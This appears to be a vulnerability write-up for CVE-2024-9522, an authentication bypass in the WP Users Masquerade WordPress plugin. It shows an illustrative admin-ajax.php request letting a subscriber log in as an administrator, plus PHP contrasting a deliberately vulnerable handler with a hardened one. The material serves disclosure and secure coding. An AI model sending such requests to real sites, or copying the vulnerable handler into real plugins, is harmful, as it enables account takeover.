@random-robbie
Created October 12, 2024 18:24
ID: 4a4f0909-76f6-4d27-87b1-f6cd5f5cbbb7
Title: WP Users Masquerade <= 2.0.0 - Authentication Bypass
Description: The WP Users Masquerade plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.0. This is due to incorrect authentication and capability checking in the 'ajax_masq_login' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator.
Type: plugin
CVSS Score: 8.8
CVE: CVE-2024-9522
Slug: wp-users-masquerade
Download Link: [Download wp-users-masquerade Version 2.0.0](https://downloads.wordpress.org/plugin/wp-users-masquerade.zip)
A raw HTTP request that reaches the `ajax_masq_login` handler is a POST to `admin-ajax.php` carrying the handler's parameters. The plugin source is not reproduced here, so the request below is a hypothetical illustration of the call's shape: the parameter names (`reset`, `uid`) have not been verified against the 2.0.0 code, and no fix is discussed.
POST /wp-admin/admin-ajax.php?action=ajax_masq_login HTTP/1.1
Host: example.com
Cookie: wordpress_logged_in_<COOKIEHASH>=<session cookie of a subscriber-level account>
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

reset=0&uid=admin
In this request:
- `action=ajax_masq_login` selects the `wp_ajax_ajax_masq_login` hook in `admin-ajax.php`. WordPress dispatches `wp_ajax_` hooks only for logged-in users (anonymous callers get `wp_ajax_nopriv_`), so the session cookie is what routes the request to the vulnerable function; it is not an authorisation check.
- `reset=0` indicates that we are not ending an existing masquerade session but starting one as another user.
- `uid=admin` names the account to log in as (here, an administrator). Whether the handler expects a numeric user ID or a login name is not established by the advisory; `admin` is a placeholder value.

This request assumes that:
1. The attacker holds a valid session for an account with at least subscriber-level permissions; the advisory describes no unauthenticated path.
2. The `$_SESSION['wpmsq_active']` variable does not already hold an active masquerade session for the current user.
3. The parameter names and session-handling details above come from this write-up, not from the plugin source, and have not been verified against it.
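The advisory's root cause is an AJAX handler that switches the session to an arbitrary user while checking only that the caller is logged in. The following is an added illustration of that bug class beside a hardened handler; it is not the WP Users Masquerade plugin's code, and every function, hook, nonce and meta-key name in it is hypothetical. It uses only standard WordPress API calls (`check_ajax_referer`, `current_user_can`, `user_can`, `get_user_by`, `wp_set_auth_cookie`, `wp_send_json_*`).

```php
<?php
// Added example, not the plugin's own code. Hook names mirror the advisory's
// 'ajax_masq_login' action; everything else is a hypothetical name.

// VULNERABLE PATTERN (do not register this): any logged-in user, including a
// subscriber, can become any other user. Registered under wp_ajax_*, this
// handler only ever runs for logged-in callers, so is_user_logged_in() adds
// nothing: there is no capability check and no nonce.
function vuln_ajax_masq_login() {
    if ( ! is_user_logged_in() ) {                 // satisfied by a subscriber
        wp_send_json_error( 'not logged in', 401 );
    }
    if ( ! empty( $_POST['reset'] ) ) {            // 'reset' ends a masquerade
        unset( $_SESSION['wpmsq_active'] );
        wp_send_json_success( 'masquerade ended' );
    }
    $user = get_user_by( 'id', absint( $_POST['uid'] ?? 0 ) );
    if ( ! $user ) {
        wp_send_json_error( 'no such user', 404 );
    }
    $_SESSION['wpmsq_active'] = $user->ID;
    wp_set_current_user( $user->ID );              // session becomes the target
    wp_set_auth_cookie( $user->ID );               // persisted in the auth cookie
    wp_send_json_success( array( 'masquerading_as' => $user->user_login ) );
}

// HARDENED PATTERN: same behaviour, gated on CSRF token, capability and a
// privilege ceiling, with an audit trail for reversal.
function safe_ajax_masq_login() {
    // 1. CSRF: the admin UI must send a nonce created with
    //    wp_create_nonce( 'wpmsq_masq_nonce' ) in the 'nonce' field; dies on failure.
    check_ajax_referer( 'wpmsq_masq_nonce', 'nonce' );

    // 2. Authorisation: only users who may already act on other accounts.
    if ( ! current_user_can( 'edit_users' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    if ( ! empty( $_POST['reset'] ) ) {
        unset( $_SESSION['wpmsq_active'] );
        wp_send_json_success( 'masquerade ended' );
    }

    $user = get_user_by( 'id', absint( $_POST['uid'] ?? 0 ) );
    if ( ! $user ) {
        wp_send_json_error( 'no such user', 404 );
    }

    // 3. Privilege ceiling: never masquerade upward. A caller without
    //    manage_options cannot become an administrator, and on multisite a
    //    non-super-admin cannot become a super admin.
    if ( user_can( $user, 'manage_options' ) && ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    if ( is_multisite() && is_super_admin( $user->ID ) && ! is_super_admin() ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 4. Audit: record who started the masquerade so it can be reversed and
    //    reviewed later (hypothetical meta key).
    update_user_meta( $user->ID, 'wpmsq_original_user', get_current_user_id() );

    $_SESSION['wpmsq_active'] = $user->ID;
    wp_set_current_user( $user->ID );
    wp_set_auth_cookie( $user->ID );
    wp_send_json_success( array( 'masquerading_as' => $user->user_login ) );
}
add_action( 'wp_ajax_ajax_masq_login', 'safe_ajax_masq_login' );
```

The request shown earlier would be rejected by the hardened handler at step 1 (no `nonce` field) before the `uid` value is even read; a subscriber who does supply a valid nonce is then stopped at step 2 by `current_user_can( 'edit_users' )`.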